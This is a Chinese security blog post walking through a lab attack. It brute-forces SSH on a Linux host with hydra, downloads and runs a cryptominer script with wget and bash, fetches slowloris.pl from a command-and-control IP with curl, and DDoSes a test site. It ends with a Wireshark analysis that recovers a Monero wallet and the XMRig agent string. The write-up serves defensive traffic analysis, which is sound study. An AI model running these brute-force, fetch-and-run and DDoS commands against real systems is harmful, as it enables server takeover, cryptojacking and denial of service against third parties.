来自:信安之路(微信号:xazlsec)
作者:Cherishao
眨眼间,2018 年的上半年就这样飞逝而过,在上半年的工作中,接触最常规的安全事件就是服务器或者办公主机被远控作为肉鸡挖矿来获取利益或者对其它网站进行 DDoS 攻击,今天分享一下
如何利用 Linux 常规的 SSH 弱口令爆破 Linux 服务器并利用该服务器进行挖矿及对其它网站进行 DDoS 攻击
,攻击即分析流程较为简单,如有不适之处,欢迎斧正。
实验环境
使用的 Linux 服务器及搭建的站点源码及使用的域名如下:
Linux: Kali 2.0
IP:192.168.95.132
网站部署源码:DiscuzX.7z
部署工具:phpstudy
Website Domain: Cherishao.com
使用的工具如下:
SSH爆破:hydra-8.1-windows
远程终端管理:X term
分析工具:Wireshark
网站搭建
网上下载 DiscuzX 源码,利用 PHPStudy 快速建站工具,将其源码放在其 WWW 目录下,启动即可(阅读 README.md 文档)。
域名绑定
将自己的 IP 地址,绑定在自己注册的域名,添加解析记录即可:
攻击流程
利用安全工具对指定的平台服务器(该服务器提供了常见的网络服务,例如 Web 服务、终端服务等)进行 SSH 暴力破解攻击。攻击流程设计如下:
SSH 爆破
通过分析扫描目标站点(IP地址:192.168.95.132)服务器,发现服务器开启 SSH22 端口、操作系统类型为 Linux。
利用 hydra 进行 SSH 爆破获取服务器权限:
hydra -l root -P 字典 -V ssh://192.168.95.132
通过暴力破解得到的 (root/123456) 进入服务器:
连接上服务器后,运行脚本获取远端挖矿程序。服务器当前状态:
利用服务器挖矿
获取安装脚本
wget --no-check-certificate
https://www.yiluzhuanqian.com/soft/script/mservice_2_5.sh
-O mservice.sh
执行脚本开始挖矿
sudo bash mservice.sh 10014 #该ID可替换为自己的用户ID
服务器挖矿时的 CPU 状态(CPU 飙升到 96%):
DDoS 攻击
利用该服务器对(网站: Cherishao.com ) DDoS 攻击。
从 C2 服务器,获取 DDoS shell
Curl
http://173.82.235.146/slowloris.pl
对该站点进行 DDos 攻击
slowloris.pl -dns cherishao.com -timeout 1 - num 1000
网站正常运行时状态:
Ddos 攻击后网站状态:
通信特征流分析
利用 Wireshark 抓包分析
挖矿数据流分析
从上图的通信数据流中,我们可以发现挖矿者使用的钱包地址:
42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik
代理:
“XMRig/2.5.2”
Xig 代理特征
